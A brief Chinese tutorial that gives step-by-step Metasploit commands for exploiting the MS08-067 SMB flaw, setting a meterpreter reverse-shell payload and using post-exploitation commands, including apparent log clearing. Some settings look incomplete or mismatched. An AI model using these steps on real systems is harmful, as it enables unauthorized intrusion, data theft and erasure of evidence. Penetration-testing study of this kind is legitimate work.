1、运行命令msfconsole,开启msf
2、search命令用于查找msf内中的模块,运行search ms08-067,查找要利用的漏洞(ms08_067),结果:
exploit/windows/smb/ms08_067_netapi
3、使用该模块,运行use exploit/windows/smb/ms08_067_netapi
4、使用命令show options查看需要设置那些参数,yes为必选项,该模块只需要设置目的主机
5、设置目的主机set RHOST 192.168.1.1
6、设置payload为反弹shell,运行命令set payload windows/x64/meterpreter/reverse_tcp
7、运行run进行渗透。
8、渗透成功会返回shell,msf内置的可用命令,cd,cat,del,edit,ls,mkdir,rmdir,upload,download,clearrev等。
部分渗透模块可能还需要设置目标主机操作系统类型,可以使用以下命令:
show targets //查看模块适配的操作系统
set target 34 //34为操作系统编号
在实际使用中多使用show命令查看设置信息,unset取消设置的参数,退回上一步使用back,推出msf使用exit。